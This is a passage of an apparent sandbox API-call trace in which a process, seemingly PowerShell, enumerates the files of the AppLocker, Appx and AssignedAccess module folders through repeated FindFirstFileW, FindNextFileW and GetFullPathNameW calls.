hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.028] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0226.028] FindNextFileW (in: hFindFile=0x1a5cf7f0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.028] FindClose (in: hFindFile=0x1a5cf7f0 | out: hFindFile=0x1a5cf7f0) returned 1 [0226.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.028] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0226.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.028] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.029] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0226.029] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0226.029] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.029] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.029] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0226.029] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0226.030] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.030] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0226.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.030] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0226.030] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0226.030] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.030] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.031] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0226.031] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0226.031] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0226.031] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.032] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.032] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.032] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0226.032] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0226.032] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf910 [0226.032] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.032] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0226.032] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0226.033] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0226.033] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.033] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0226.033] FindClose (in: hFindFile=0x1a5cf910 | out: hFindFile=0x1a5cf910) returned 1 [0226.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.033] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0226.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.033] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.033] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0226.034] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0226.034] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.034] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.034] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0226.034] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0226.034] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0226.035] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.035] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.035] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.035] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0226.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.075] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0226.076] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0226.076] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.076] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.076] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0226.077] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0226.077] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.077] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 